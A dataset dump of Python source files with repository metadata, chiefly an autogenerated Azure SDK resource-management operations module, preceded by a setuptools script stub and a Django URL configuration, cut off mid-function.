# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"1051933474@qq.com"
] | 1051933474@qq.com | |
9c1fdfa1cf187a7a17c2c72acdf43883bcf11dce | 78d7e2b47418afe873db61c77241a0094f3bcab0 | /circulante/circulante/urls.py | b23e2db39021a3b02652ff6eaa6c245e2b10d698 | [] | no_license | Rodrigo-Ornellas/circulante | f239aeefc78c804a3a2e607ae85cbcb99a64cde9 | 4a2e2813a927a5e1a05c3784e5c9c412b441fe7f | refs/heads/master | 2021-01-15T17:42:11.283401 | 2012-05-09T01:52:04 | 2012-05-09T01:52:04 | 4,059,306 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 771 | py | from django.conf.urls import patterns, include, url
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'circulante.views.home', name='home'),
# url(r'^circulante/', include('circulante.foo.urls')),
url(r'^cat/', include('circulante.catalogo.urls')),
# Uncomment the admin/doc line below to enable admin documentation:
url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
url(r'^admin/', include(admin.site.urls)),
# Django-Registration:
url(r'^contas/', include('registration.backends.default.urls')),
url(r'^', include('circulante.catalogo.urls')),
)
| [
"rodrigo.ornellas@mail.com"
] | rodrigo.ornellas@mail.com |
30fc99c1e299f230a6679c3c4150367665d667e7 | 30736dab9d8e682e5603d4803349144a5f6a84fb | /sdk/resources/azure-mgmt-resource/azure/mgmt/resource/resources/v2019_08_01/operations/_resources_operations.py | 2532fbe114047a2aa4df6e55706d0512029e99c1 | [
"MIT",
"LicenseRef-scancode-generic-cla"
] | permissive | montgomp/azure-sdk-for-python | 6fcaffc59f4321852aa71109691e94ad38c66464 | 0ffb0b0de095b97cbc5b69309bbce0a3b91d3eb4 | refs/heads/master | 2020-12-06T11:08:01.683369 | 2020-01-07T23:24:42 | 2020-01-07T23:24:42 | 232,445,563 | 1 | 0 | MIT | 2020-01-08T00:45:33 | 2020-01-08T00:45:33 | null | UTF-8 | Python | false | false | 64,532 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrest.polling import LROPoller, NoPolling
from msrestazure.polling.arm_polling import ARMPolling
from .. import models
class ResourcesOperations(object):
"""ResourcesOperations operations.
You should not instantiate directly this class, but create a Client instance that will create it for you and attach it as attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: The API version to use for this operation. Constant value: "2019-08-01".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2019-08-01"
self.config = config
def list_by_resource_group(
self, resource_group_name, filter=None, expand=None, top=None, custom_headers=None, raw=False, **operation_config):
"""Get all the resources for a resource group.
:param resource_group_name: The resource group with the resources to
get.
:type resource_group_name: str
:param filter: The filter to apply on the operation.<br><br>The
properties you can use for eq (equals) or ne (not equals) are:
location, resourceType, name, resourceGroup, identity,
identity/principalId, plan, plan/publisher, plan/product, plan/name,
plan/version, and plan/promotionCode.<br><br>For example, to filter by
a resource type, use: $filter=resourceType eq
'Microsoft.Network/virtualNetworks'<br><br>You can use
substringof(value, property) in the filter. The properties you can use
for substring are: name and resourceGroup.<br><br>For example, to get
all resources with 'demo' anywhere in the name, use:
$filter=substringof('demo', name)<br><br>You can link more than one
substringof together by adding and/or operators.<br><br>You can filter
by tag names and values. For example, to filter for a tag name and
value, use $filter=tagName eq 'tag1' and tagValue eq 'Value1'. When
you filter by a tag name and value, the tags for each resource are not
returned in the results.<br><br>You can use some properties together
when filtering. The combinations you can use are: substringof and/or
resourceType, plan and plan/publisher and plan/name, identity and
identity/principalId.
:type filter: str
:param expand: The $expand query parameter. You can expand createdTime
and changedTime. For example, to expand both properties, use
$expand=changedTime,createdTime
:type expand: str
:param top: The number of results to return. If null is passed,
returns all resources.
:type top: int
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of GenericResource
:rtype:
~azure.mgmt.resource.resources.v2019_08_01.models.GenericResourcePaged[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
if top is not None:
query_parameters['$top'] = self._serialize.query("top", top, 'int')
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.GenericResourcePaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/resources'}
def _move_resources_initial(
self, source_resource_group_name, resources=None, target_resource_group=None, custom_headers=None, raw=False, **operation_config):
parameters = models.ResourcesMoveInfo(resources=resources, target_resource_group=target_resource_group)
# Construct URL
url = self.move_resources.metadata['url']
path_format_arguments = {
'sourceResourceGroupName': self._serialize.url("source_resource_group_name", source_resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'ResourcesMoveInfo')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def move_resources(
self, source_resource_group_name, resources=None, target_resource_group=None, custom_headers=None, raw=False, polling=True, **operation_config):
"""Moves resources from one resource group to another resource group.
The resources to move must be in the same source resource group. The
target resource group may be in a different subscription. When moving
resources, both the source group and the target group are locked for
the duration of the operation. Write and delete operations are blocked
on the groups until the move completes. .
:param source_resource_group_name: The name of the resource group
containing the resources to move.
:type source_resource_group_name: str
:param resources: The IDs of the resources.
:type resources: list[str]
:param target_resource_group: The target resource group.
:type target_resource_group: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._move_resources_initial(
source_resource_group_name=source_resource_group_name,
resources=resources,
target_resource_group=target_resource_group,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
move_resources.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{sourceResourceGroupName}/moveResources'}
def _validate_move_resources_initial(
self, source_resource_group_name, resources=None, target_resource_group=None, custom_headers=None, raw=False, **operation_config):
parameters = models.ResourcesMoveInfo(resources=resources, target_resource_group=target_resource_group)
# Construct URL
url = self.validate_move_resources.metadata['url']
path_format_arguments = {
'sourceResourceGroupName': self._serialize.url("source_resource_group_name", source_resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'ResourcesMoveInfo')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def validate_move_resources(
self, source_resource_group_name, resources=None, target_resource_group=None, custom_headers=None, raw=False, polling=True, **operation_config):
"""Validates whether resources can be moved from one resource group to
another resource group.
This operation checks whether the specified resources can be moved to
the target. The resources to move must be in the same source resource
group. The target resource group may be in a different subscription. If
validation succeeds, it returns HTTP response code 204 (no content). If
validation fails, it returns HTTP response code 409 (Conflict) with an
error message. Retrieve the URL in the Location header value to check
the result of the long-running operation.
:param source_resource_group_name: The name of the resource group
containing the resources to validate for move.
:type source_resource_group_name: str
:param resources: The IDs of the resources.
:type resources: list[str]
:param target_resource_group: The target resource group.
:type target_resource_group: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._validate_move_resources_initial(
source_resource_group_name=source_resource_group_name,
resources=resources,
target_resource_group=target_resource_group,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
validate_move_resources.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{sourceResourceGroupName}/validateMoveResources'}
def list(
self, filter=None, expand=None, top=None, custom_headers=None, raw=False, **operation_config):
"""Get all the resources in a subscription.
:param filter: The filter to apply on the operation.<br><br>The
properties you can use for eq (equals) or ne (not equals) are:
location, resourceType, name, resourceGroup, identity,
identity/principalId, plan, plan/publisher, plan/product, plan/name,
plan/version, and plan/promotionCode.<br><br>For example, to filter by
a resource type, use: $filter=resourceType eq
'Microsoft.Network/virtualNetworks'<br><br>You can use
substringof(value, property) in the filter. The properties you can use
for substring are: name and resourceGroup.<br><br>For example, to get
all resources with 'demo' anywhere in the name, use:
$filter=substringof('demo', name)<br><br>You can link more than one
substringof together by adding and/or operators.<br><br>You can filter
by tag names and values. For example, to filter for a tag name and
value, use $filter=tagName eq 'tag1' and tagValue eq 'Value1'. When
you filter by a tag name and value, the tags for each resource are not
returned in the results.<br><br>You can use some properties together
when filtering. The combinations you can use are: substringof and/or
resourceType, plan and plan/publisher and plan/name, identity and
identity/principalId.
:type filter: str
:param expand: The $expand query parameter. You can expand createdTime
and changedTime. For example, to expand both properties, use
$expand=changedTime,createdTime
:type expand: str
:param top: The number of results to return. If null is passed,
returns all resource groups.
:type top: int
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of GenericResource
:rtype:
~azure.mgmt.resource.resources.v2019_08_01.models.GenericResourcePaged[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
if top is not None:
query_parameters['$top'] = self._serialize.query("top", top, 'int')
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.GenericResourcePaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list.metadata = {'url': '/subscriptions/{subscriptionId}/resources'}
def check_existence(
self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, custom_headers=None, raw=False, **operation_config):
"""Checks whether a resource exists.
:param resource_group_name: The name of the resource group containing
the resource to check. The name is case insensitive.
:type resource_group_name: str
:param resource_provider_namespace: The resource provider of the
resource to check.
:type resource_provider_namespace: str
:param parent_resource_path: The parent resource identity.
:type parent_resource_path: str
:param resource_type: The resource type.
:type resource_type: str
:param resource_name: The name of the resource to check whether it
exists.
:type resource_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: bool or ClientRawResponse if raw=true
:rtype: bool or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.check_existence.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'resourceProviderNamespace': self._serialize.url("resource_provider_namespace", resource_provider_namespace, 'str'),
'parentResourcePath': self._serialize.url("parent_resource_path", parent_resource_path, 'str', skip_quote=True),
'resourceType': self._serialize.url("resource_type", resource_type, 'str', skip_quote=True),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.head(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [204, 404]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = (response.status_code == 204)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
check_existence.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{parentResourcePath}/{resourceType}/{resourceName}'}
def _delete_initial(
self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'resourceProviderNamespace': self._serialize.url("resource_provider_namespace", resource_provider_namespace, 'str'),
'parentResourcePath': self._serialize.url("parent_resource_path", parent_resource_path, 'str', skip_quote=True),
'resourceType': self._serialize.url("resource_type", resource_type, 'str', skip_quote=True),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete(
self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes a resource.
:param resource_group_name: The name of the resource group that
contains the resource to delete. The name is case insensitive.
:type resource_group_name: str
:param resource_provider_namespace: The namespace of the resource
provider.
:type resource_provider_namespace: str
:param parent_resource_path: The parent resource identity.
:type parent_resource_path: str
:param resource_type: The resource type.
:type resource_type: str
:param resource_name: The name of the resource to delete.
:type resource_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
resource_provider_namespace=resource_provider_namespace,
parent_resource_path=parent_resource_path,
resource_type=resource_type,
resource_name=resource_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{parentResourcePath}/{resourceType}/{resourceName}'}
def _create_or_update_initial(
self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, parameters, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.create_or_update.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'resourceProviderNamespace': self._serialize.url("resource_provider_namespace", resource_provider_namespace, 'str'),
'parentResourcePath': self._serialize.url("parent_resource_path", parent_resource_path, 'str', skip_quote=True),
'resourceType': self._serialize.url("resource_type", resource_type, 'str', skip_quote=True),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'GenericResource')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 201, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('GenericResource', response)
if response.status_code == 201:
deserialized = self._deserialize('GenericResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update(
self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, parameters, custom_headers=None, raw=False, polling=True, **operation_config):
"""Creates a resource.
:param resource_group_name: The name of the resource group for the
resource. The name is case insensitive.
:type resource_group_name: str
:param resource_provider_namespace: The namespace of the resource
provider.
:type resource_provider_namespace: str
:param parent_resource_path: The parent resource identity.
:type parent_resource_path: str
:param resource_type: The resource type of the resource to create.
:type resource_type: str
:param resource_name: The name of the resource to create.
:type resource_name: str
:param parameters: Parameters for creating or updating the resource.
:type parameters:
~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns GenericResource or
ClientRawResponse<GenericResource> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
resource_provider_namespace=resource_provider_namespace,
parent_resource_path=parent_resource_path,
resource_type=resource_type,
resource_name=resource_name,
parameters=parameters,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('GenericResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{parentResourcePath}/{resourceType}/{resourceName}'}
def _update_initial(
self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, parameters, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.update.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'resourceProviderNamespace': self._serialize.url("resource_provider_namespace", resource_provider_namespace, 'str'),
'parentResourcePath': self._serialize.url("parent_resource_path", parent_resource_path, 'str', skip_quote=True),
'resourceType': self._serialize.url("resource_type", resource_type, 'str', skip_quote=True),
'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'GenericResource')
# Construct and send request
request = self._client.patch(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('GenericResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update(
self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, parameters, custom_headers=None, raw=False, polling=True, **operation_config):
"""Updates a resource.
:param resource_group_name: The name of the resource group for the
resource. The name is case insensitive.
:type resource_group_name: str
:param resource_provider_namespace: The namespace of the resource
provider.
:type resource_provider_namespace: str
:param parent_resource_path: The parent resource identity.
:type parent_resource_path: str
:param resource_type: The resource type of the resource to update.
:type resource_type: str
:param resource_name: The name of the resource to update.
:type resource_name: str
:param parameters: Parameters for updating the resource.
:type parameters:
~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns GenericResource or
ClientRawResponse<GenericResource> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._update_initial(
resource_group_name=resource_group_name,
resource_provider_namespace=resource_provider_namespace,
parent_resource_path=parent_resource_path,
resource_type=resource_type,
resource_name=resource_name,
parameters=parameters,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('GenericResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{parentResourcePath}/{resourceType}/{resourceName}'}
def get(
self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, custom_headers=None, raw=False, **operation_config):
"""Gets a resource.
:param resource_group_name: The name of the resource group containing
the resource to get. The name is case insensitive.
:type resource_group_name: str
:param resource_provider_namespace: The namespace of the resource
provider.
:type resource_provider_namespace: str
:param parent_resource_path: The parent resource identity.
:type parent_resource_path: str
:param resource_type: The resource type of the resource.
:type resource_type: str
:param resource_name: The name of the resource to get.
:type resource_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: GenericResource or ClientRawResponse if raw=true
:rtype:
~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get.metadata['url']
path_format_arguments = {
